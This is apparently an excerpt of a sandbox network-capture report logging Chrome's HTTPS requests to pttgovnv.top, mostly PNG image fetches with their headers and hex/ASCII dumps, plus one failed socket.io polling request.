          2024-09-01 22:25:27 UTC1369INData Raw: 53 b1 f5 e8 85 a5 a6 16 f1 62 f3 69 cf 40 15 67 55 d7 ec f7 76 fd d3 e7 87 73 5f a7 58 87 2d 5c e3 69 44 88 bb 40 98 f9 95 ca 7d 2b dc f5 ba cf 0b ea 03 00 c0 b1 d1 a4 ff ab 8c 87 fb f1 b7 df 4f dd cb 4c 11 4d 61 80 bd 05 ba b2 3a 55 04 82 6c 0b 75 69 57 9a ea 6a 45 11 12 92 ad ff ac a0 62 78 77 ef e9 ae 2e 5e 37 95 cf 8a 56 c9 ae 28 72 7a 15 f7 54 34 f2 f2 bb 47 88 f0 fd 1c ac f6 b4 7b 10 de bb 0a 8f 9a 0a a7 4c 05 97 7c af d7 e2 36 57 bd 12 03 64 7f e3 26 58 89 dc 77 66 0b b1 43 da ea 09 00 a0 29 2a b8 9a 2c 3e 98 d4 f8 4c 5b fb 61 c3 86 e9 d2 74 aa e7 bd 5d 8d aa b1 57 37 05 42 27 59 71 24 b2 09 32 f7 75 81 46 d2 e2 f9 44 bc 0e 23 47 5a f2 bd 53 f7 7c 13 6c f9 bc 2c 56 78 a5 8d ea 54 85 51 af 4e ae 35 5d 20 21 f7 94 6e 70 9f d2 93 82 85 29 77 41 1c 9c
          Data Ascii: Sbi@gUvs_X-\iD@}+OLMa:UluiWjEbxw.^7V(rzT4G{L|6Wd&XwfC)*,>L[at]W7B'Yq$2uFD#GZS|l,VxTQN5] !np)wA
          2024-09-01 22:25:27 UTC1369INData Raw: 54 84 7e 4b 54 ab 23 ff f7 3a 95 6a 47 ac 6f dd 72 5a c0 1f 73 b7 5c a5 9a 98 46 9f 46 62 e3 32 2f 76 d5 40 26 6a 2c 27 3a f5 3a 36 8d ec 93 4f 56 ec be 7a ca c6 26 9d cb 7d 4b 45 90 eb b5 d8 e7 10 3e db a9 b9 fe 8f 91 73 48 79 65 5d eb 54 4b 3c 67 9f 5c 64 55 b0 c6 f9 0d 4c 3d 78 ab b1 68 99 a9 d3 37 05 3f 97 96 78 9b 6e d6 bc 95 2c 18 04 b4 69 d0 4f b4 ce ed c2 53 2e b9 06 d3 c8 33 e8 b9 e5 b4 f7 59 41 a7 9e 6a bb c1 ab 50 3e 38 f3 6d f9 41 ed d2 c4 96 99 96 77 5f eb d4 45 50 2f 26 75 84 9c 0e 30 43 a1 f5 a6 60 7a 33 8f 7c 3e 6c 67 45 02 67 aa b6 f6 7a 43 e5 15 13 8b db 8a f1 ad 12 cb fd 16 7f 8b c1 cf 31 8b 38 1b 53 16 e9 ec 65 2a 6a aa 1e b6 69 a4 b3 08 2b d2 b8 4d af d2 1a f7 e4 a7 28 ff 5a 1c af bd 87 50 1b 76 62 44 e8 38 30 80 fe fd c4 2d 63 e5 52
          Data Ascii: T~KT#:jGorZs\FFb2/v@&j,'::6OVz&}KE>sHye]TK<g\dUL=xh7?xn,iOS.3YAjP>8mAw_EP/&u0C`z3|>lgEgzC18Se*ji+M(ZPvbD80-cR


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          99192.168.2.449843172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC599OUTGET /help/layout/images/53.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC723INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 68155
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"10a3b-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9bsGWVnJ2B2N34Wn5zqxGg9kygKxMadmbm9R6QXe%2FLz2yJ2TkPmGJC07eV3pXF9YALsZWciirbJJQXZFsOHqR4lc4Pc7EkxVByX5MhAsZVa4ekQH6A7urmd%2F4vgVug%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad25588415cb-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC646INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 09 c8 49 44 41 54 78 da ec 9d 07 80 14 e5 d9 c7 9f 77 66 eb f5 e3 38 38 40 8a 14 1b 16 9a 15 63 c5 8a d8 7b fd 6c 88 dd a8 51 a3 18 4d 62 4c 34 cd 98 68 2c 31 2a 2a b6 28 16 ec 1a 13 2b 2a 08 08 0a 48 87 a3 1c 70 c7 f5 db db 9d 79 df ef ad 33 ef ec 1d 2a 24 c4 c2 f3 4b d6 6d b3 b3 b3 b3 b3 37 7f fe 4f 23 8c 31 40 10 04 41 10 04 41 be 5f 38 b8 0b 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxwf88@c{lQMbL4h,1**(+*Hpy3*$Km7O#1@AA_8AAP! (AAq (AAq
          2024-09-01 22:25:27 UTC1369INData Raw: 10 04 45 1c 82 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 08 8a 38 04 41 10 04 41 10 14 71 08 82 20 08 82 20 08 8a 38 04 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 8a 38 04 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43
          Data Ascii: E "AAE "AAA "AAA CAA CAAP! (AAP! (AAq (AAq 8AAq 8AAE 8AAE "AAA "AAA CAA C
          2024-09-01 22:25:27 UTC1369INData Raw: 1e 7a 28 96 cb 64 72 97 5c 7c d1 6e 7f b9 eb ee 71 fc e1 33 41 15 21 98 2f b8 73 95 63 0b 20 cf 03 6f f9 12 a0 cb 97 82 ff c5 4c a0 d5 cb f9 73 8e 72 c5 84 e0 12 05 a9 d2 59 63 52 90 c9 8b cf 02 b1 c6 f4 6d 21 e8 08 b3 96 93 7a cd e7 8f 11 b5 1e aa 85 1d b5 5f 4b e5 eb 89 f5 1a e0 e2 4e 3c 2e c5 1f 17 95 2c e3 81 5b 56 04 ce f6 db 43 7c d7 61 10 1b b2 33 c4 fa f6 06 88 e9 76 87 62 59 f7 6b 43 bb f6 01 2f 3f 78 a6 bd fd 1f 63 cf 3b ff a6 09 8f 4c f8 62 dc d8 b1 ce 83 13 1e 21 ed 99 36 0c b9 22 08 82 20 28 e2 90 cd cb 3d 77 df 55 76 ca 69 a7 ef 53 bd 6c f9 31 db 0f 1e 7c 34 71 48 09 89 0a b7 4e 05 1c cb b4 01 ad 59 01 74 cd 6a 2e d8 96 f2 eb 1a a0 eb 1b b8 18 6a 87 20 ca 4a b5 63 26 b4 8f 10 5a 52 60 09 07 0d 02 77 0d e4 43 3a 6c 6a 96 0d ea 4a f5 f2 cc b8
          Data Ascii: z(dr\|nq3A!/sc oLsrYcRm!z_KN<.,[VC|a3vbYkC/?xc;Lb!6" (=wUviSl1|4qHNYtj.j Jc&ZR`wC:ljJ
          2024-09-01 22:25:27 UTC1369INData Raw: 34 79 6a 6a 64 3d d3 07 12 48 c7 4f e4 a4 39 42 24 89 6b be bc 13 77 b9 c8 8b 83 cb 85 1d 49 ba 10 4b 15 80 9b 4c 82 13 8b f1 e7 63 20 66 a1 06 05 0d c6 91 33 21 5a c2 c2 8a 54 ed c2 59 fd de 20 28 a8 08 ee d2 a0 90 35 14 6b 61 e8 95 01 0d 57 69 96 30 f9 77 a2 70 83 6f 6f 7c f8 20 48 ec b1 37 24 76 dd 03 dc de bd 37 d4 83 ce fe d1 34 3d fd c4 e3 0f bd f6 fa 1b bf 4f 26 12 d5 a2 09 9d f8 fe f0 48 46 10 04 41 50 c4 6d 61 7c f4 e1 94 ad 46 ec b6 eb 9f b9 b8 39 da 71 88 90 56 2e 74 52 69 ca 9a 9b 20 f7 c1 5b e0 2f 5d 00 24 9e 0a dc 2d e1 9e 39 5c 70 41 2c 0e 99 05 4b a0 75 de 12 c8 56 af 81 4c cd 3a 19 86 74 45 e2 3f 17 2b 52 cc 88 c4 7f bd f2 78 2a 01 f1 a2 22 88 95 17 83 93 4e 42 2c 99 00 97 5f 9b bc 36 e2 f0 d7 70 31 26 04 21 cb aa 52 53 9a e5 22 32 97 03
          Data Ascii: 4yjjd=HO9B$kwIKLc f3!ZTY (5kaWi0wpoo| H7$v74=O&HFAPma|F9qV.tRi [/]$-9\pA,KuVL:tE?+Rx*"NB,_6p1&!RS"2
          2024-09-01 22:25:27 UTC1369INData Raw: d9 c0 7c d3 dc b4 f7 80 2e 98 03 90 4c 88 09 ed d0 3a 77 21 d4 3e fb 26 78 4d 2d 32 7f 4d b4 c8 88 97 16 41 e9 de 23 a0 70 fb ad 01 12 71 35 fd 40 ba 6e e1 ec d1 b0 37 9c 72 df 82 50 6a 87 99 a6 f6 d8 2b e3 a6 d9 e1 51 5b c4 85 0e 5d 30 81 c1 a7 96 e3 45 a3 02 8f 9a b1 5d 34 6c 00 4c 20 22 e0 b4 52 d2 1a 2f ac 4a 65 54 84 54 95 9a f2 3d 9d 9f c7 74 8b 13 97 e8 e9 13 8e 16 72 7a 1d 56 45 2b d3 db a4 aa 53 7d 59 d0 40 a8 25 1c d5 bb 68 4d 29 fa c9 39 e1 84 0a 62 be 16 d3 af 0e b4 c3 a7 9d ba 76 21 e6 ba 42 c9 4d 37 40 72 f8 b0 af aa 64 e5 5f 8b b7 e6 97 bf fc c5 e9 b7 df fe db 7f 09 39 28 26 6f e0 2f 02 41 10 04 41 11 f7 3d 60 dc d8 b1 64 eb 7e fd 92 a3 46 8d ba 61 f8 6e bb 5d 0b 61 b3 de c8 59 df 5f 36 1f fc 39 9f 01 6b 69 02 bf b6 1e 9a 67 cf 82 e6 e9 f3
          Data Ascii: |.L:w!>&xM-2MA#pq5@n7rPj+Q[]0E]4lL "R/JeTT=trzVE+S}Y@%hM)9bv!BM7@rd_9(&o/AA=`d~Fan]aY_69kig
          2024-09-01 22:25:27 UTC1369INData Raw: fb 9c 0b c9 c2 d3 c6 40 e1 99 63 81 c4 e3 9d ba 72 be ef 37 ff e4 ea ab ae b9 ff 81 07 27 9c 7e f2 c9 d9 bf de 77 2f ba 72 08 82 20 08 8a b8 ff 35 a6 02 b5 b9 b9 f9 dd c2 c2 c2 3d 88 48 d4 ca 6b 1d e2 cd 9a 0a b4 7a 11 ac fa cb 83 d0 3a 67 89 9c 31 2a 9c b2 92 11 db 43 d7 e3 47 07 62 29 2c 50 60 ca 89 d3 af 67 26 2c 6a 35 df 65 46 4c 19 67 4c e6 ac a9 c9 08 94 fa ca 51 f3 f3 ab 4b fd 50 04 e9 f7 62 3a fc 1a 0a 41 88 84 68 99 16 6a 84 86 c2 ce 6e fc ab 1c 38 50 8d db 4c d1 04 b0 bc 34 b2 fc 9c b2 e8 68 2d d1 7b ce 21 e6 39 35 ac 9e 10 3d 36 cb ea f7 26 fa d2 31 3d 6a 8b 11 23 16 89 ce 6f 53 71 58 ea 51 35 f3 55 7c 2e d1 00 b9 7b 17 88 55 96 aa e5 e2 ae fc 2c 7e 4d 1d 78 ab eb 74 b4 d7 8a 74 eb f9 b3 2a 1f ce 84 5e 75 c8 17 4c 3e a1 98 2b ab b7 5d 75 43 01
          Data Ascii: @cr7'~w/r 5=Hkz:g1*CGb),P`g&,j5eFLgLQKPb:Ahjn8PL4h-{!95=6&1=j#oSqXQ5U|.{U,~Mxtt*^uL>+]uC
          2024-09-01 22:25:27 UTC1369INData Raw: 99 a0 2f 15 84 1f e6 b1 31 1a 6d c8 6b 8a 10 74 ff 37 26 0b 1a a2 c5 0b cc 7a 6d 30 db d4 14 26 74 d6 56 24 78 9d 76 d0 3c bb 0f 5d 28 fc 82 82 06 9a 17 fe f5 c3 ea cd ce a7 33 40 10 9a 65 4c 8d d8 62 c6 49 04 6a e5 c2 a9 62 86 60 ea 82 1f 1a 57 14 2c b7 52 bc 42 4f 10 0b 24 17 35 5a 8e aa 66 c1 41 58 94 bf 83 27 22 ae 54 e5 c5 31 55 75 eb f6 e9 06 a9 c1 03 00 12 09 70 e2 09 f0 6a eb 20 f3 de 67 3a ac ca f8 ee a7 f2 8b 0e 3c 3a 3f 2f 6f cf 44 a1 1d b5 8d 32 77 2e a8 cc d5 22 90 a9 d9 ac cc cb 41 c5 5d bf 83 d4 5e 23 3b 1b d9 25 63 b0 d7 5e 7d d5 55 7f fc cb dd 77 65 33 6d ed f8 ab 43 10 04 41 0c 18 4e dd 44 44 08 f5 67 37 df 7c cc c0 81 83 5e d0 02 2e b2 2f 73 b3 a7 c1 aa f1 e3 a1 e5 b3 39 32 2c 97 da a1 17 f4 bc fc 74 88 77 29 d3 61 47 3b f4 67 72 c0 6c
          Data Ascii: /1mkt7&zm0&tV$xv<](3@eLbIjb`W,RBO$5ZfAX'"T1Uupj g:<:?/oD2w."A]^#;%c^}Uwe3mCANDDg7|^./s92,tw)aG;grl
          2024-09-01 22:25:27 UTC1369INData Raw: 23 61 28 54 0f a2 07 33 32 cb 12 bf 2c df 15 34 35 06 72 c4 58 28 f0 42 ed ac 3f 23 e8 fe 6e da 2d f3 e6 55 43 f3 2b ef 40 6e 6d 9d f0 c6 a4 90 2b 3e ee 10 20 c5 69 b0 12 0b c3 0a 5b 66 39 af f2 7d 75 cf bc 40 f0 99 7c 43 d0 42 4f 59 85 ed ff 9a 01 75 37 ff ac 33 11 27 c4 70 72 fc cd 37 5f 72 e5 e5 97 5d ff c0 84 87 53 f8 cb 44 10 04 41 11 87 7c 0d ab aa 57 54 fc f5 9e 7b 7e eb ba 6e 54 c0 71 71 d2 f0 c4 df a0 fa a2 2b 65 ae 56 c1 b0 ad a1 e7 cd 97 82 5b d1 45 8f 7e a2 79 85 02 10 09 a9 ca de 6b 41 3e 9a 25 ba 00 c2 90 a9 39 c9 1b 07 8e b1 4e 1c b8 70 fc 96 12 1e 56 ee 1a 98 80 62 5e b8 d4 14 2d 00 eb d8 93 ce 38 56 ba 05 47 10 72 34 db 60 da 90 04 9f 8d 58 7b 45 87 10 2d 37 2d 74 e2 f2 2a 30 3b a4 64 46 5d 38 62 e5 a8 91 68 88 51 ed 12 3d 8b 95 04 51 62
          Data Ascii: #a(T32,45rX(B?#n-UC+@nm+> i[f9}u@|CBOYu73'pr7_r]SDA|WT{~nTqq+eV[E~ykA>%9NpVb^-8VGr4`X{E-7-t*0;dF]8bhQ=Qb
          2024-09-01 22:25:27 UTC1369INData Raw: 70 d4 01 e0 54 54 c8 82 95 96 d7 de 80 ec 8c 85 fc 09 47 85 69 21 0c c9 b2 60 76 98 be f6 1d 6b 6e 2c 84 33 70 c5 4d a2 8e 85 c4 2e 03 a0 cb cd b7 40 7c c0 a0 fc c3 95 7e 32 65 ca 17 e7 5d 78 e1 79 73 e6 cc 99 95 cd 64 5a f1 17 8c 20 08 82 22 6e 8b 64 d4 a8 51 c5 2f bc 38 79 62 41 3a 35 1a f2 87 d9 f3 fd b5 7a 5d 3d 8c 39 e3 52 98 57 5d 13 69 e7 25 4e fc 2e 7f e0 e7 6d 75 70 28 64 64 8b b0 e2 dd 87 40 e5 c9 a3 e5 78 25 29 68 bc 30 2f 2e d2 dc 57 de 56 39 71 d4 38 63 11 97 0d 82 e7 43 37 4d 35 e2 25 e0 f1 97 53 70 84 c8 10 73 a4 4c 63 5f 4f b8 80 be 14 0d 4a d4 81 25 f8 8c 03 07 d1 75 6a a1 26 85 52 30 27 35 14 93 ca 89 83 60 fc 97 1a d3 05 81 2b 65 55 14 58 2e 1c 84 4e 1d 21 c1 e7 21 24 6c ae 4b a9 ed d8 51 99 3f 26 04 8f 94 62 7e b4 b9 2f f1 44 41 80 29
          Data Ascii: pTTGi!`vkn,3pM.@|~2e]xysdZ "ndQ/8ybA:5z]=9RW]i%N.mup(dd@x%)h0/.WV9q8cC7M5%SpsLc_OJ%uj&R0'5`+eUX.N!!$lKQ?&b~/DA)
          2024-09-01 22:25:27 UTC1369INData Raw: 90 00 f6 bc 56 eb 75 be 11 97 76 55 2a 8b b8 6b 1d 5d 38 d8 40 41 03 04 02 ce 38 71 4c 57 84 46 43 a9 76 41 83 d1 28 ca b7 33 fa 31 58 af 35 27 36 1c 74 6f e6 af 86 15 a9 aa 0a d4 12 99 41 b1 83 76 bd 74 7f 37 aa c3 d5 c4 77 f5 b0 7a e3 c2 e9 ed 10 4e 5d ce 01 e2 5a 6d 64 b4 a0 a5 ae 12 8e 42 78 16 1e b0 3b 94 9c 73 3e 40 7d 03 b4 be fb 36 b4 3c fb 66 50 c0 12 1a 70 3a 84 ad dd 43 e1 12 4a d1 e8 3b 32 7c 6c 1a 14 ab dc 3c 7d 7c 95 24 a1 fc fa eb a0 f0 f0 88 db 26 57 57 b3 6a 55 cd de fb ee 7b cc d2 65 cb 66 e5 b0 d0 01 41 10 e4 07 09 e6 c4 59 5c 76 c5 8f 4f e5 27 f6 be da 81 93 92 e4 83 a9 b3 e0 de 49 af 40 3c 95 d8 e8 f5 99 20 e1 bf b9 08 38 26 d5 1d 56 91 18 e4 56 36 c1 ca 7b 9e 86 cc c2 45 56 55 24 b5 7a c9 41 28 42 20 14 3a 60 0f 6b 0f f4 11 0d 4c b4
          Data Ascii: VuvU*k]8@A8qLWFCvA(31X5'6toAvt7wzN]ZmdBx;s>@}6<fPp:CJ;2|l<}|$&WWjU{efAY\vO'I@< 8&VV6{EVU$zA(B :`kL


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          100192.168.2.449845104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liMU5&sid=-SnapXukcxVrNsxsBQUE HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:28 UTC575INHTTP/1.1 400 Bad Request
          Date: Sun, 01 Sep 2024 22:25:28 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2Fb0Ykmw26UMfkhz%2FORcKKlBu9vnqjN06frKFIhP5qJtRgqT37d%2FdlmJYQ7B%2BVNi5YQL6u0ASBRcV6SzDxJNDIX1U7pcH4LLA9q4vm8hN4sjubwGoZiZbmpjAopH%2FOA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad255a4dc463-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:28 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          101192.168.2.449846104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC361OUTGET /help/layout/images/46.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC730INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 44008
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"abe8-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nrrW62fq9%2FvGEwakN3Sn7dxliV7k6MWXD%2BKfxR1KJqoNeyfVNWLiF%2FVoQi8xVgGC2cYd7OHVlBDs15YAfxQNyz%2BgFAk1Q%2FwW8RLls2yt%2FUKpbawlYmIre0KaM4WvwCY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad25588b42f5-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 ab 75 49 44 41 54 78 da ec bd 07 9c 64 65 95 bf ff bd 95 73 e8 1c a6 c3 e4 04 13 c8 41 60 08 8a 0a 4a 10 cc 0a 98 70 55 74 8c ab 6b 42 d7 8f eb ae ba 80 fe 95 dd fd ad 0b 6c 02 13 49 85 c5 48 4e ce 30 03 0c 30 c0 84 ee 9e 9e ce d5 dd 55 5d 39 fe df f3 d6 bd d5 b7 aa ab 7b 7a 66 3a 54 77 9f 67 3e 35 15 ba e2 ad 1b 9e 3a e7 3d e7 55 72 b9 1c 18 86 61 18 86 61 98 85 85 c2 12 c7 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<uIDATxdesA`JpUtkBlIHN00U]9{zf:Twg>5:=Uraa0000100,q00,q0
          2024-09-01 22:25:27 UTC1369INData Raw: c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 12 c7 30 0c 53 29 3c 55 df 5a 23 ce ac e2 54 a3 88 73 25 7f b9 56 81 02 ed 76 b9 13 53 d4 9d d9 31 bc 86 b6 f7 13 bb c1 21 71 96 50 af 0e e6 90 a3 cb 09 f1 f7 21 71 4a 9c d9 df 35 c4 df 08
          Data Ascii: 0100,q00K00K000010100,q00K00K0000100,q00,q00K000000100,q00,q00K00000S)<UZ#Ts%VvS1!qP!qJ5
          2024-09-01 22:25:27 UTC1369INData Raw: 67 9e a8 6f d9 62 84 72 bb 90 b6 cd 94 3a 35 ca 3e 6f aa b4 95 89 bc 99 ca 44 e0 98 85 4d 51 64 4e 27 71 e9 92 02 88 f4 b8 cc 3d 9f cd e1 da d3 fa 3b 79 7e 56 86 61 89 63 18 66 ae d1 52 a7 42 da 3e 33 2e 6f ea 39 c6 53 a7 c6 92 31 6f 1c 79 5b fc 32 97 3e a2 d4 15 8a 1f 38 c5 ca 30 2c 71 0c c3 cc 25 ea fc a6 37 0b 41 6b cb 0b da 78 f4 4d 9f 2e 95 91 37 96 b7 25 47 69 eb 91 0c 8a 8b 1e 32 c5 51 b9 4e 71 db f6 53 fb 78 5e 56 86 61 89 63 18 66 d6 50 a3 6f b7 6b 55 a7 a5 a9 53 fd b8 37 63 89 d0 b1 bc 2d 6d 99 cb e8 ce f5 e3 e5 74 32 77 9f 9a 62 e5 a8 1c c3 b0 c4 31 0c 33 93 a8 0d 7b ef 15 42 e6 2d 97 32 2d 7b 8e c5 39 b3 42 bf 3b 27 53 83 0d 61 c3 71 c9 69 28 9b c5 c0 49 56 2c db 95 84 4d 59 9c 35 b9 fa d6 24 7a 89 4b 97 3f 0f 0a 99 bb fc d4 3e ee 2d c7 30 2c
          Data Ascii: gobr:5>oDMQdN'q=;y~VacfRB>3.o9S1oy[2>80,q%7AkxM.7%Gi2QNqSx^VacfPokUS7c-mt2wb13{B-2-{9B;'Saqi(IV,MY5$zK?>-0,
          2024-09-01 22:25:27 UTC1369INData Raw: e3 df 26 89 78 54 f4 e7 a1 c8 d2 c8 65 75 30 d4 fb a1 a8 ef d5 60 b7 cc d9 eb 5b 5f 88 23 39 38 0c c5 28 96 aa 10 26 57 7d 2d ea 56 b4 c9 bf 85 07 03 18 7a 6d 3f c6 02 c3 e3 f7 77 38 90 dc 7d 50 b6 ce 98 6d 68 5c 60 2e 93 81 d9 9a 5f 1e c1 d1 51 d8 3e 77 92 ac 98 3d 1a 68 6c dd 7c 15 46 18 f5 51 62 94 1d 27 d7 a6 16 3c b0 c8 31 cc 1c 63 e2 45 c0 30 73 2a 70 54 81 7a bb be 80 a1 70 60 2c e9 01 37 1f c5 0b 23 5e 20 d4 60 84 e5 a5 84 ec 6d 46 a7 23 a5 70 03 6e 21 46 17 6d 45 4e dc 97 a2 5e 10 b2 a1 cc 91 78 f6 79 00 fb d7 df 88 c0 e0 10 fa 0e f7 c0 5b 5b 0d 4f 63 3d aa 57 ad 40 24 30 82 78 28 2c c7 c6 11 ae 2a 3f dc b5 55 70 d6 d6 20 bd 7a 05 0e e0 0e b8 ff 38 0c df 2c 46 e4 ac 17 54 21 9b ce a8 e9 5e 93 8c 06 e6 36 2f c7 c0 8a 3d 68 3d 98 9d 52 da 28 92 99
          Data Ascii: &xTeu0`[_#98(&W}-Vzm?w8}Pmh\`._Q>w=hl|FQb'<1cE0s*pTzp`,7#^ `mF#pn!FmEN^xy[[Oc=W@$0x(,*?Up z8,FT!^6/=h=R(
          2024-09-01 22:25:27 UTC1369INData Raw: ac 12 0b f0 63 a7 c2 ba bc 11 66 8b 05 06 4d 6a d4 e0 54 5e 2a e9 1c f9 51 f7 1e 07 0e 77 74 16 1e bf 6c d3 06 39 e5 16 bd af 78 68 0c f1 8e c3 ea 83 73 e3 4f 52 06 1a 0d d8 fd b3 87 b0 ec 89 f0 94 d2 96 3b c5 25 0b 11 9c a7 af 43 da 63 47 2c 1a 43 22 1a 9d 20 ba 34 bf ab 4d c8 21 49 6e 4c 2c 27 8a 5e 5a ac d6 7c f4 2d 16 2b ba bf c7 e7 43 e2 73 77 a3 66 78 e1 ec 9b 33 d0 8f 87 63 91 63 18 96 38 86 59 e0 02 a7 1f 03 67 2a d3 03 ce b8 00 04 4e 3b 40 8f 7e 7e 0b d2 2b 1b f3 d2 a6 8a 19 a5 4f 69 26 04 da 87 50 04 2b 2a 24 89 04 ce 5d e5 93 02 47 85 0e 74 3f 1a a3 46 b2 65 50 fb b8 51 53 5e 6a 80 0b 21 30 91 bd 9d 18 fb eb 2b 48 bd d0 8b 86 